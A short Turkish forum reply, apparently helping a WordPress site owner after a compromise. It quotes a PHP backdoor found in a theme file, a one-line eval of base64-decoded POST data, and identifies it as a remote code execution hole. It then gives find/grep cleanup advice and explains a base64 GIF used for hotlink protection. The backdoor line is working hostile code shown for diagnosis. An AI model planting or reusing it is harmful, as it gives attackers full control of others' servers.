Timthumb içindemiydi bu encode edilmiş veri ?
<?php if(isset($_POST["cspdnbtxql"])){@eval(base64_decode($_POST["cspdnbtxql"]));die();}?><?php get_header(); ?>üzgünüm bu backdoor : / cspdnbtxql request ile kod çalıştırabilir ... işi bilen kimse ise daha büyük güzelliklerde yapabilir .. sunucu yöneticine ulaş tek tek uğraşmadan tüm dizininde benzer kodları aratsın
find . -name "*.php" -print | xargs sed -i xxxxx
find . -type f | xargs grep " " çeşitlendirebilir söylersen anlar o...
bulup bunları temizledikten sonra logları incele.
$imgData = base64_decode("R0lGODlhUAAMAIAAAP8AAP///yH5BAAHAP8ALAAAAABQAAwAAAJpjI+py+0Po5y0OgAMjjv01YU Z\nOGplhWXfNa6JCLnWkXplrcBmW+spbwvaVr/cDyg7IoFC2KbYVC2NQ5MQ4ZNao9Ynzjl9ScNYpneb\nDULB3RP 6JuPuaGfuuV4fumf8PuvqFyhYtjdoeFgAADs=");bu önemsiz veri işlendiğinde not hotlink adlı resmi çekiyor, senin verilerini farklı birileri kullanmasın diye...